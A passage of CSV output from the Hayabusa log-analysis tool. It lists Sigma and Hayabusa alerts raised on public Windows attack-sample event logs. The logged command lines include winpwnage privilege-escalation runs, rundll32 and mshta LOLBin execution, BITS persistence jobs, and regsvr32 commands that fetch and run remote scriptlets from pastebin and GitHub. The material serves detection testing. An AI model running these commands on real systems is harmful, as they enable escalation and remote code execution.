c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.258 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.352 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} 
S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:40.342 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 22:30:32.931 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.556 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: 
IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious 
Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:01.383 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:55:56.626 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Suspicious Rundll32 
Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:58:39.850 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 23:18:03.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-13 02:01:43.391 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:50.781 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe : Path: C:\Windows\System32\pcalua.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: 
IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:20:01.980 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:31.183 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Suspicious 
ftp.exe,,rules/sigma/process_creation/win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.458 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\system32\calc.exe : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 03:04:50.121 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: backdoor : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,informational,Process Creation,"Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.780 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA 
scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:48:52.219 +09:00,IEWIN7,1,informational,Process Creation,"Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll : Path: C:\ProgramData\jabber.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 03:48:52.766 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 23:50:59.389 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: hola : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-14 03:02:49.160 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mobsync.exe -Embedding : Path: C:\Windows\System32\mobsync.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 
+09:00,IEWIN7,1,informational,Process Creation,Command: /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.895 +09:00,IEWIN7,1,informational,Process Creation,Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: /c notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:05:18.692 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : 
User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mshta.exe -Embedding : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 
+09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.143 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 288 03573528 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 
